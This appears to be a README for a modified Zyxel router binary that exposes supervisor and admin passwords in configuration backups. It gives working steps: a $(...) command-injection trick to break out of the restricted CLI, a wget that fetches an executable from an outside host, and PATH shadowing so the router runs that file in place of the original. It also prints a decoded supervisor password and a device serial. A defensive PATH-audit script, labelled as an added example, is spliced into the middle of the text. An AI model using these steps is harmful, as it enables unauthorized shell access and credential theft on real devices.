Tj hacker@iam.tj

2017-08-01

For owners of Zyxel routers such as the VMG8924 who want access to the unencrypted supervisor password without having to use cracking tools.

This modified executable of /bin/zycfgfilter allows the unencrypted passwords of the supervisor, admin, and other users to be exported via the regular administration web interface (Maintenance > Configuration > Backup Configuration).

Decoding the configuration file entries

The entries in the configuration-backupsettings.conf file will only be Base64 encoded and will look similar to this:

<AdminPassword>_ZEncrypted_MzBlZWM4Y2YA</AdminPassword>
<UserName>admin</UserName>
<Password>_ZEncrypted_MTIzNAA=</Password>

To decode them, strip the leading "_ZEncrypted_" and Base64-decode the remainder:

# supervisor (a.k.a. root - UID = 0) for device serial # 31005832
echo MzBlZWM4Y2YA | base64 -d
30eec8cf

# 'admin' default
echo MTIzNAA= | base64 -d
1234

How it works

The only difference in the modified zycfgfilter is that every string within the executable that refers to an XML node storing a password had the upper-case "P" of "Password" converted to a lower-case "p". This means the filter fails to match the entries fed to it from dumpmdm and so only Base64-encodes the passwords instead of encrypting them.

The reason this works is that zycfgfilter is called by the httpd service to filter out sensitive entries from the output of the dumpmdm tool (available in the router's CLI).

The original file is at

/bin/zycfgfilter

That file cannot be overwritten because it sits on a read-only file system. But the shell PATH variable lists other directories before /bin/, so a modified copy placed in one of them is executed instead of the system file. In this case the directory to use (which doesn't exist by default) is "/home/bin/".
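The search-order weakness described above, as an added shell example (not from the original README): it walks a PATH value and reports every directory consulted before the one that holds a given system binary, noting whether each is absent (so it could be created) or writable. The PATH value, binary name and trusted directory are constructed inputs, not read from a router.

```shell
#!/bin/sh
# Added example: audit PATH search order for a system binary.
# Usage: path_shadow_audit "<PATH string>" <binary name> <trusted dir>
# Prints one line per directory searched before <trusted dir>.
# Returns 0 when <trusted dir> is reached first (nothing can shadow the
# binary), 1 when at least one earlier directory exists in the search order.
path_shadow_audit() {
    path=$1; name=$2; trusted=$3
    found=0
    # Split the PATH string on ':' into positional parameters.
    old_ifs=$IFS
    IFS=:
    set -- $path
    IFS=$old_ifs
    for dir in "$@"; do
        # An empty PATH element means the current directory.
        [ -n "$dir" ] || dir=.
        if [ "$dir" = "$trusted" ]; then
            break
        fi
        if [ -e "$dir/$name" ]; then
            printf 'SHADOWED: %s/%s exists ahead of %s\n' "$dir" "$name" "$trusted"
        elif [ ! -d "$dir" ]; then
            printf 'RISK: %s is absent but searched before %s (could be created)\n' "$dir" "$trusted"
        elif [ -w "$dir" ]; then
            printf 'RISK: %s is writable and searched before %s\n' "$dir" "$trusted"
        else
            printf 'info: %s is searched before %s\n' "$dir" "$trusted"
        fi
        found=1
    done
    return $found
}

# Constructed PATH modelled on the layout described above (a /home/bin
# entry listed before /bin); this value was not captured from a device.
EXAMPLE_PATH="/home/bin:/usr/sbin:/usr/bin:/sbin:/bin"
path_shadow_audit "$EXAMPLE_PATH" zycfgfilter /bin \
    || echo "zycfgfilter in /bin can be shadowed on this PATH"
```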

Router Shell Hack

The original trick I discovered back in 2014 to execute shell commands from the terminal CLI:

> cat& bash

has been closed off in recent firmware upgrades, so there's another way to execute commands. It's a bit more convoluted and less than ideal, but it's enough to do emergency hacking. The new method is to create a sub-shell with $(...) to execute a single command, e.g.:

> echo $(uname -a)
Linux (none) 2.6.30 #3 SMP PREEMPT Thu May 25 18:09:29 CST 2017 mips GNU/Linux

Installation

To install on a Zyxel router (e.g. VMG8924) do, from a PC:

# set router IP
RIP=10.254.1.254

# Either:

ssh admin@$RIP

# Or:

telnet $RIP
# login: admin

> echo $(mkdir /home/bin)
> echo $(wget http://iam.tj/projects/zyxel/zycfgfilter -O /home/bin/zycfgfilter) 
Connecting to iam.tj (109.74.197.122:80)
zycfgfilter            0% |                                                 |     0  --:--:-- ETAEOMTime:1501717911.174968 2017-08-02T23:51:51.174968
zycfgfilter          100% |*************************************************| 66604  --:--:-- ETA
200 OK, File Get Success
> echo $(chmod +x /home/bin/zycfgfilter )
> echo $(ls -l /home/bin) 
-rwxr-xr-x 1 supervis root 66604 Aug 2 23:17 zycfgfilter

Now use the web interface to backup the configuration file to the PC and it will contain the passwords with the base64 encoding.

Do It Yourself

If you don't trust my modifications - although they are only conversions of "P" to "p" in several occurrences of "Password" - then do it yourself by copying and modifying the file.

Verify Digital Signature and No Tampering

The SHA-1 hash (shasum's default) of the modified file is:

shasum zycfgfilter
9aa2a0b54c258b7d67a075db9ddc9f77f110c064  zycfgfilter

This is in the SHASUMS file. I've signed that file using GNU Privacy Guard (gpg) and the detached signature is SHASUMS.gpg. Both these files are in the same directory as zycfgfilter at:

https://iam.tj/projects/zyxel/

My public key ID is hacker@iam.tj and the fingerprint is:

2C9A BEB5 03E2 285A 6A5B  8A91 EFEC 37A4 29CD 6080

To add my public key to your keyring using its fingerprint:

gpg --keyserver keyserver.ubuntu.com --recv 0x2C9ABEB503E2285A6A5B8A91EFEC37A429CD6080

Once you've imported my public key to your keyring verify the SHASUMS file hasn't been tampered with:

gpg2 --verify SHASUMS.gpg SHASUMS 
gpg: Signature made Thu 03 Aug 2017 01:11:19 BST using RSA key ID 9ACC1423
gpg: Good signature from "TJ <tj@iam.tj>" [ultimate]
....

and then check that the file(s) you've downloaded match:

shasum -c SHASUMS
zycfgfilter: OK
README.html: OK
README.md: OK

Comments

Any comments please direct to the forum thread at:

http://forum.kitz.co.uk/index.php/topic,20067.0.html


This document created using:

pandoc --toc -s -t html5 -o README.html README.md